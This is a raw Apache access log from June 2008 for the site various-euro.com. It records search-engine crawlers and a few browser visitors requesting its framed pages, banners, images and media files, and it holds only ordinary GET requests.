67.195.51.189 - - [06/Jun/2008:07:23:18 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.106 - - [06/Jun/2008:07:38:29 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.106 - - [06/Jun/2008:07:38:30 +0200] "GET /partnergegenberlin.html HTTP/1.0" 200 5022 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.54.60 - - [06/Jun/2008:07:57:31 +0200] "GET /DgH/ HTTP/1.0" 200 5024 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.212.216 - - [06/Jun/2008:08:05:12 +0200] "GET /zampa/lybia/slike/tele.jpg HTTP/1.0" 200 28022 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.25.145 - - [06/Jun/2008:08:08:26 +0200] "GET /f-channel1.html HTTP/1.1" 200 5713 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.52.51 - - [06/Jun/2008:08:31:43 +0200] "GET /DgH/orginal/ HTTP/1.0" 200 1727 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.157 - - [06/Jun/2008:08:42:16 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.157 - - [06/Jun/2008:08:42:17 +0200] "GET /triple-double-u/ HTTP/1.1" 403 1223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.52.106 - - [06/Jun/2008:08:45:28 +0200] "GET /f-bannnerz.html HTTP/1.0" 200 12651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.106 - - [06/Jun/2008:08:49:24 +0200] "GET /neon/warning2.html HTTP/1.0" 200 997 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:09:09:42 +0200] "GET /DgH/rampe/ HTTP/1.0" 200 2056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:09:09:42 +0200] "GET /DgH/rampe/pict/Rampe.mp3 HTTP/1.0" 200 8295 "http://www.various-euro.com/DgH/rampe/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [06/Jun/2008:09:19:17 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.4 - - [06/Jun/2008:09:19:18 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.8.106 - - [06/Jun/2008:09:36:06 +0200] "GET /f-world.html HTTP/1.0" 200 35590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:09:38:52 +0200] "GET /3dsf3/sendi/hyperreality.html HTTP/1.0" 200 1436 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.106 - - [06/Jun/2008:09:42:23 +0200] "GET /logs/usage_200605.html HTTP/1.0" 200 109635 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:09:43:58 +0200] "GET /neon/left-one-new.html HTTP/1.0" 200 1483 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.99 - - [06/Jun/2008:09:44:13 +0200] "GET /f-actions.html HTTP/1.0" 200 10429 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.88 - - [06/Jun/2008:09:46:15 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.28 - - [06/Jun/2008:09:46:15 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.106 - - [06/Jun/2008:09:47:05 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.15 - - [06/Jun/2008:10:02:20 +0200] "GET /neon/slow-walk2.html HTTP/1.1" 200 1777 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
74.6.22.151 - - [06/Jun/2008:10:15:37 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [06/Jun/2008:10:15:37 +0200] "GET /DgH/orginal/index.html HTTP/1.0" 200 1727 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [06/Jun/2008:10:17:50 +0200] "GET /rez/555.mp3 HTTP/1.0" 200 6017674 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [06/Jun/2008:10:37:46 +0200] "GET /world.html HTTP/1.0" 200 16295 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
128.54.48.98 - - [06/Jun/2008:10:38:06 +0200] "GET / HTTP/1.0" 200 10127 "http://www.modukit.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
74.6.22.151 - - [06/Jun/2008:10:44:12 +0200] "GET /logs/usage_200706.html HTTP/1.0" 200 107008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.52.143.15 - - [06/Jun/2008:10:50:49 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.15 - - [06/Jun/2008:10:51:01 +0200] "GET /neon/warning2.html HTTP/1.1" 200 997 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
195.29.214.253 - - [06/Jun/2008:10:53:30 +0200] "GET / HTTP/1.0" 200 10127 "http://www.google.hr/search?q=fan+stuff+euro&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:30 +0200] "GET /ve-icon-2.ico HTTP/1.0" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:30 +0200] "GET /framez_0.html HTTP/1.0" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /framez.html HTTP/1.0" 200 3883 "http://www.various-euro.com/framez_0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5834 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /bannerz/neon_click_3.gif HTTP/1.0" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /bannerz/neon_click_1.gif HTTP/1.0" 200 890 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /eurosign3.gif HTTP/1.0" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /bannerz/goolag_468.jpg HTTP/1.0" 200 28285 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /bannerz/wet.gif HTTP/1.0" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /bannerz/ubu-shot.png HTTP/1.0" 200 200117 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.6.22.151 - - [06/Jun/2008:10:53:41 +0200] "GET /framez_0.html HTTP/1.0" 200 12444 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.29.214.253 - - [06/Jun/2008:10:53:33 +0200] "GET /bannerz/ve.jpg HTTP/1.0" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.6.17.188 - - [06/Jun/2008:11:44:05 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.154 - - [06/Jun/2008:11:44:06 +0200] "GET /contact.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.98.41.74 - - [06/Jun/2008:11:47:07 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
65.98.41.74 - - [06/Jun/2008:11:47:08 +0200] "GET /framez.html HTTP/1.0" 200 3883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
65.98.41.74 - - [06/Jun/2008:11:47:08 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5834 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
65.98.41.74 - - [06/Jun/2008:11:47:08 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
65.98.41.74 - - [06/Jun/2008:11:47:09 +0200] "GET /schubb/schubb-1.html HTTP/1.0" 200 9070 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
65.98.41.74 - - [06/Jun/2008:11:47:09 +0200] "GET /schubb/schubb-2.html HTTP/1.0" 200 16660 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
65.98.41.74 - - [06/Jun/2008:11:47:09 +0200] "GET /schubb/schubb-3.html HTTP/1.0" 200 17546 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
65.98.41.74 - - [06/Jun/2008:11:47:10 +0200] "GET /schubb/schubb-4.html HTTP/1.0" 200 17746 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
65.98.41.74 - - [06/Jun/2008:11:47:10 +0200] "GET /schubb/schubb-5.html HTTP/1.0" 200 72944 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
209.19.152.77 - - [06/Jun/2008:12:18:49 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"
65.55.211.160 - - [06/Jun/2008:12:46:01 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [06/Jun/2008:12:46:01 +0200] "GET /f-bannnerz.html HTTP/1.1" 200 12651 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.110.73 - - [06/Jun/2008:12:47:00 +0200] "GET /f-bannnerz.html HTTP/1.0" 200 12651 "http://search.live.com/results.aspx?q=various&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.110.73 - - [06/Jun/2008:12:47:01 +0200] "GET /framez.html HTTP/1.0" 200 3883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.110.73 - - [06/Jun/2008:12:47:01 +0200] "GET /bannerz/sound/blood-Sound002.mid HTTP/1.0" 200 9960 "-" "Windows-Media-Player/10.00.00.3998"
65.55.110.73 - - [06/Jun/2008:12:47:01 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.110.73 - - [06/Jun/2008:12:47:01 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5834 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.110.73 - - [06/Jun/2008:12:47:02 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
74.6.22.151 - - [06/Jun/2008:12:56:48 +0200] "GET /channel1.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [06/Jun/2008:12:59:33 +0200] "GET /f-rez.html HTTP/1.1" 200 9765 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.151 - - [06/Jun/2008:12:59:35 +0200] "GET /logs/usage_200704.html HTTP/1.0" 200 108835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:13:14:04 +0200] "GET /3dsf3/sendi/body.html HTTP/1.0" 200 1322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:13:14:05 +0200] "GET /3dsf3/sendi/formate.css HTTP/1.0" 200 474 "http://www.various-euro.com/3dsf3/sendi/body.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.226.20.33 - - [06/Jun/2008:13:20:20 +0200] "GET /f-euro.html HTTP/1.1" 200 12203 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:21 +0200] "GET /WLlabel.gif HTTP/1.1" 200 1834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:21 +0200] "GET /naziline468_60.gif HTTP/1.1" 200 16867 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:21 +0200] "GET /etxtreme_breakfast.gif HTTP/1.1" 200 14204 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:21 +0200] "GET /Rampe-DgH.jpg HTTP/1.1" 200 12044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:22 +0200] "GET /DgH001.jpg HTTP/1.1" 200 6960 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:22 +0200] "GET /Bull-DgH01.jpg HTTP/1.1" 200 9010 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:22 +0200] "GET /Watch-DgH.jpg HTTP/1.1" 200 12152 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:22 +0200] "GET /bannerz/whosafraid-banner.gif HTTP/1.1" 200 3866 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:22 +0200] "GET /bannerz/ugs-b.gif HTTP/1.1" 200 3128 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:22 +0200] "GET /bannerz/raf-logo02_tn.gif HTTP/1.1" 200 11804 "http://www.various-euro.com/f-euro.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:23 +0200] "GET /framez-euro.html HTTP/1.1" 200 4319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:23 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "http://www.various-euro.com/framez-euro.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:24 +0200] "GET /f-euro.html HTTP/1.1" 200 12203 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:24 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-euro.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:24 +0200] "GET /naziline468_60.gif HTTP/1.1" 200 16867 "http://www.various-euro.com/f-euro.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:24 +0200] "GET /WLlabel.gif HTTP/1.1" 200 1834 "http://www.various-euro.com/f-euro.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:24 +0200] "GET /etxtreme_breakfast.gif HTTP/1.1" 200 14204 "http://www.various-euro.com/f-euro.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:25 +0200] "GET /Rampe-DgH.jpg HTTP/1.1" 200 12044 "http://www.various-euro.com/f-euro.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:24 +0200] "GET /bannerz/ubu-shot.png HTTP/1.1" 200 200117 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.226.20.33 - - [06/Jun/2008:13:20:25 +0200] "GET /f-euro.html HTTP/1.1" 200 12203 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
91.127.44.132 - - [06/Jun/2008:13:22:35 +0200] "GET /framez-zeug.html HTTP/1.1" 200 4311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.127.44.132 - - [06/Jun/2008:13:22:36 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.127.44.132 - - [06/Jun/2008:13:22:37 +0200] "GET /f-zeug.html HTTP/1.1" 200 45338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.127.44.132 - - [06/Jun/2008:13:22:39 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.52.143.15 - - [06/Jun/2008:13:24:14 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.15 - - [06/Jun/2008:13:24:16 +0200] "GET /f-warez.html HTTP/1.1" 200 10953 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.15 - - [06/Jun/2008:13:40:43 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.1" 200 2129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
71.41.200.78 - - [06/Jun/2008:13:48:55 +0200] "GET / HTTP/1.1" 200 10127 "-" "MLBot (www.metadatalabs.com/mlbot)"
67.195.51.121 - - [06/Jun/2008:13:51:40 +0200] "GET /channel1.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.78.63.174 - - [06/Jun/2008:14:14:55 +0200] "GET / HTTP/1.1" 200 10127 "http://cc.msnscache.com/cache.aspx?q=73448584656884&mkt=en-CA&setlang=en-US&w=93eb182c,9cb41015&FORM=CVRE3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:04 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:23 +0200] "GET /framez.html HTTP/1.1" 200 3883 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:27 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:27 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5834 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:32 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:42 +0200] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:50 +0200] "GET /partnergegenberlin.html HTTP/1.1" 200 5022 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:43 +0200] "GET /bannerz/goolag_468.jpg HTTP/1.1" 200 28285 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:54 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:16:40 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:15:34 +0200] "GET /bannerz/ubu-shot.png HTTP/1.1" 200 200117 "http://www.various-euro.com/frame-menu.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:16:57 +0200] "GET / HTTP/1.1" 200 10127 "http://cc.msnscache.com/cache.aspx?q=73448584656884&mkt=en-CA&setlang=en-US&w=93eb182c,9cb41015&FORM=CVRE3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:02 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:16 +0200] "GET /framez.html HTTP/1.1" 200 3883 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:18 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:18 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5834 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:22 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:25 +0200] "GET /bannerz/goolag_468.jpg HTTP/1.1" 200 28285 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:31 +0200] "GET /bmpp/euro_pal_1.html HTTP/1.1" 200 18252 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:47 +0200] "GET / HTTP/1.1" 200 10127 "http://cc.msnscache.com/cache.aspx?q=73448584656884&mkt=en-CA&setlang=en-US&w=93eb182c,9cb41015&FORM=CVRE3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:39 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
208.78.63.174 - - [06/Jun/2008:14:17:25 +0200] "GET /bannerz/ubu-shot.png HTTP/1.1" 206 104101 "http://www.various-euro.com/frame-menu.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.6.22.151 - - [06/Jun/2008:14:50:11 +0200] "GET /sendi_agent.html HTTP/1.0" 200 6213 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:14:58:24 +0200] "GET /games/virtualcop/virtualcop.html HTTP/1.0" 200 4487 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.54.26 - - [06/Jun/2008:15:22:57 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
